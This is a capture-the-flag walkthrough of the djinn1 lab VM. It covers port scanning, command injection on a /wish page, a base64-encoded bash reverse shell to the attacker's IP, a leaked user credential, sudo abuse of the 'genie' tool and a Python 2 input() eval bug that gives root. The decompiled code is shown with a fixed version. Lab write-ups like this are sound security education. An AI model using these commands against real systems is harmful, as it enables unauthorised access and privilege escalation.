djinn1-WALKTHROUGH

1. Port scanning

The target prints its IP address directly on the console, so there is no need for host discovery.

Go straight to a port scan:

root@kali:~# nmap -sS -A 192.168.203.148 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 09:34 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.148
Host is up (0.00047s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp filtered ssh
MAC Address: 00:0C:29:63:02:D0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.203.148

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.28 seconds

Only port 21 is open, and port 22 is filtered. (This looks like another port-knocking exercise.)

Not entirely at ease with that, I went on to scan the full port range:

root@kali:~# nmap -sS -p1-65535 192.168.203.148 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 09:38 CST
Nmap scan report for 192.168.203.148
Host is up (0.00070s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   filtered ssh
1337/tcp open     waste
7331/tcp open     swx
MAC Address: 00:0C:29:63:02:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.92 seconds

Sure enough, some had slipped through the net: ports 1337 and 7331 are open as well.

Use telnet to look at port 1337:

It turns out to be a game: answer 1000 questions and it will give us a gift. We are obviously not going to answer those 1000 questions by hand.

2. Finding the vulnerability

In the browser, I visited port 7331:

It is a page like this; use dirb to probe it:

But it kept finding nothing, because dirb's default wordlist is not strong enough:

Go to /usr/share/dirb/wordlists and look at dirb's wordlists:

I chose big.txt for brute forcing, since it has the most entries:

But that created another problem: although it can find the paths, too many errors from the target cause it to abort.

In the end I used dirsearch with dirb's big.txt wordlist.

It found two directories, which I then visited:

The genie directory returns a 403:

The /wish directory looks like a code-execution point:

Test with whoami:

It echoes www-data, which confirms the vulnerability exists.

3. Reverse shell

Start a listener on Kali.

The first attempt errored out; it looks like the payload is being filtered.

Here we can base64-encode the command and pipe it through base64 decoding to run it.

However, testing suggested the target had no nc (although once I had a shell and checked, nc was actually there), so switch to a different command:

bash -i >& /dev/tcp/192.168.203.129/7777 0>&1

Base64-encode it:

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMy4xMjkvNzc3NyAwPiYx

Then use the following command:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMy4xMjkvNzc3NyAwPiYx | base64 -d | bash

Got a shell:

4. Privilege escalation

After some poking around, I found the privileges were very low:

Nothing could be done with them.

Fortunately, searching for hidden files with ls -la turned up a credential:

nitish:p4ssw0rdStr3r0n9

Since ssh is not open, we switch user with su directly and then run sudo -l:

We can see that we may run genie as sam without sam's password.

genie -h shows the usage:

genie's help says that -p can give us a shell, but we did not get that shell.

Use the man command to view the more detailed manual for genie:

It reveals a hidden piece of information:

the -cmd parameter. Let's try it:

sudo -u sam genie -cmd id   # run the id command as user sam

Now we have successfully obtained sam's privileges.

Run sudo -l again:

The sam user can run lago as root without the root password.

$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:4
4
work your ass off!!
$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:1
1
Working on it!! 
$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100: 
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
lago  proof.sh
# ./proof.sh
./proof.sh
'unknown': I need something more specific.
    _                        _             _ _ _ 
   / \   _ __ ___   __ _ ___(_)_ __   __ _| | | |
  / _ \ | '_ ` _ \ / _` |_  / | '_ \ / _` | | | |
 / ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/   \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
                                     |___/       
djinn pwned...
__________________________________________________________________________

Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Thu Feb 27 21:20:01 IST 2020
Whoami: root
__________________________________________________________________________

By @0xmzfr

Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)

This box did not go smoothly: from the directory brute forcing at the start to the privilege escalation at the end, everything showed that I was not careful enough. And because I dislike reviewing code, I missed a lot of clues.

In fact, the most important clue was in the directory where we first landed with the shell:

From app.py we can get the nitish user's credentials:

Later, once we had the sam user, in /home/sam we saw a hidden pyc file.

Decompile it:

#!/usr/bin/env python
# encoding: utf-8
# Decompiled lago (Python 2). Note: in Python 2, input() is eval(raw_input()),
# so every input() call below evaluates whatever the user types as a Python
# expression in the calling function's scope. That is the privilege-escalation bug.

from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '


def guessit():
    # randint(1, 101) is inclusive on both ends, so the prompt's "1 to 100" is off by one.
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    # Python 2 input(): typing the bare name "num" evaluates to the local variable num,
    # so the comparison below is always True and a root shell is spawned.
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    # Same eval-on-input behaviour here: the "path" is an evaluated expression.
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'

if __name__ == '__main__':
    main(options())

This code explains why typing num at the prompt escalates privileges.

A more thorough write-up: https://blog.csdn.net/fastergohome/article/details/103537057

It also includes a Python script that solves the 1000 arithmetic questions on port 1337; impressive, and something to learn from!
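As an added illustration (not from the original post or the djinn box), the block below emulates in Python 3 the Python 2 input() behaviour that lago depends on, next to a hardened version that parses the guess as a plain integer. py2_input, guessit_vulnerable and guessit_fixed are names made up for this example.

```python
import inspect


def py2_input(raw):
    """Emulate Python 2's input(): eval() the typed text in the caller's scope.

    In Python 2, input() is eval(raw_input()) and the evaluation sees the
    calling function's globals and locals. That is why typing the name
    'num' at lago's prompt compares equal to the secret variable num.
    (Constructed helper for this example; Python 3's input() returns a str.)
    """
    caller = inspect.currentframe().f_back
    return eval(raw, caller.f_globals, caller.f_locals)


def guessit_vulnerable(raw, num=42):
    """Mirror of lago's guessit(): a True result is where it would spawn /bin/sh."""
    s = py2_input(raw)  # the caller controls an expression, not just a number
    return s == num


def guessit_fixed(raw, num=42):
    """Hardened form: accept only a literal integer, never evaluate the input."""
    try:
        s = int(raw.strip())
    except ValueError:
        return False  # names and arithmetic such as "num" or "41+1" are rejected
    return s == num


if __name__ == "__main__":
    # Constructed sample inputs: the same guess against both implementations.
    for guess in ("num", "41+1", "7", "42"):
        print("%-5s vulnerable=%s fixed=%s" % (
            guess, guessit_vulnerable(guess), guessit_fixed(guess)))
```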
